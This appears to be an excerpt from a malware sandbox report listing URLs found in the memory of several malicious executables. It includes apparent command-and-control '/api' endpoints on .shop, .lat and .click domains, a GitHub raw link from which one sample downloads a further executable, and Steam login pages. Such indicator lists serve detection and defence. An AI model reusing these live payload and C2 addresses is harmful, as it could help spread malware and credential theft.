                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://energyaffai.lat/api
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1742392652.00000000018F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/1
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1662966237.0000000005F73000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1653768285.000000000192D000.00000004.00000020.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1741566665.000000000192B000.00000004.00000020.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1742250638.000000000192C000.00000004.00000020.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1663181978.0000000005F73000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1678941497.000000000192B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1662966237.0000000005F73000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1663181978.0000000005F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api4
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1653710977.0000000005F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiF
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2699359734.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807292259.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2699359734.0000000003ADE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/#
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2509192980.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/4
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/=.
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/N
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2564282324.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/P
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/al
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2699359734.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2564282324.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2699586029.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2672741150.0000000003AE2000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2589968886.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2542063748.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2819800290.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2790348162.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612413591.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2564282324.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2589968886.0000000003AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/api7
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2575434989.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2699359734.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2564282324.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2699586029.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2672741150.0000000003AE2000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2589968886.0000000003AE1000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2542063748.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612413591.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/apiW
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2819800290.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2790348162.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/apie.
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2819800290.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2790348162.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop/apis
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/api
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                                    Source: powershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, cbfb8a9c89.exe, 0000001D.00000000.2226147614.0000000000C32000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-Downloading
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...
                                    Source: powershell.exe, 00000025.00000002.2315592782.0000000005939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.000001732A49C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                                    Source: 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4901441862.00000000009FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898729473.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4901441862.00000000009FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898729473.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4901441862.00000000009FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0w
                                    Source: 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api7w
                                    Source: 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api=
                                    Source: 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil$w
                                    Source: 696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apilg
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                                    Source: 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/o
                                    Source: 696689ce6d.exe, 0000002F.00000002.4901441862.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/oN
                                    Source: 696689ce6d.exe, 0000002F.00000002.4901441862.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piOO
                                    Source: 696689ce6d.exe, 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/vo(
                                    Source: 696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858731214.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822453760.000000000347F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824961540.000000000347F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886283552.0000000003493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858731214.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838267197.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838753795.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4846955753.0000000003491000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886283552.0000000003493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiCG
                                    Source: 696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiDH
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apid
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809217387.000000000347F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809797067.0000000003482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiion.txtPK
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat/api
                                    Source: powershell.exe, 0000001F.00000002.2281404457.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2329195901.00000000061B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.00000173398E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.0000017339A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2601624574.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2422825618.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2389530571.0000000001504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                                    Source: 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/(
                                    Source: 64252d274d.exe, 00000024.00000003.2344378819.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344227223.0000000003A57000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344051395.0000000003A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/((
                                    Source: 64252d274d.exe, 00000024.00000003.2422825618.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/3
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/E
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/H
                                    Source: 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/X
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2443015883.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2473087041.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2475086579.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2439674022.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2570767817.0000000001509000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2389530571.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api#
                                    Source: 64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api$
                                    Source: 64252d274d.exe, 00000024.00000003.2509524695.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2573407189.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2534701360.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2473087041.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2475086579.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api1v
                                    Source: 64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiS
                                    Source: 64252d274d.exe, 00000024.00000003.2430484562.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apibv
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/mv
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/mv4X
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
                                    Source: 64252d274d.exe, 00000024.00000003.2315628481.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/t
                                    Source: 64252d274d.exe, 00000024.00000003.2315628481.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/y
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847583445.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847277082.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/f
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/z
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat:443/api
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
